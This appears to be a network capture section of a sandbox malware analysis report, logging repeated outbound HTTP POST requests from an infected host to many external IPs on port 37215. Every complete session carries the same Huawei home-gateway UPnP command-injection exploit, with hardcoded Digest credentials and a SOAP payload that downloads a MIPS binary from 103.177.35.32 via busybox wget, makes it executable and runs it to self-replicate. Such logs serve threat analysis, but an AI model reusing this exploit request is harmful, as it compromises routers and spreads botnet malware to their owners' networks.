                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        853192.168.2.2333692197.44.17.8137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488759995 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        854192.168.2.2360216157.51.214.8737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488782883 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        855192.168.2.2352882192.178.203.10837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488799095 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        856192.168.2.235947047.20.90.20137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488806963 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        857192.168.2.234153641.44.191.13237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488816023 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        858192.168.2.2338398157.230.179.18137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488826036 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        859192.168.2.234409241.224.83.13237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488840103 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        860192.168.2.235372436.92.84.18737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488884926 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        861192.168.2.2353438197.162.115.7637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488909006 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        862192.168.2.235910685.65.165.25337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.489187956 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
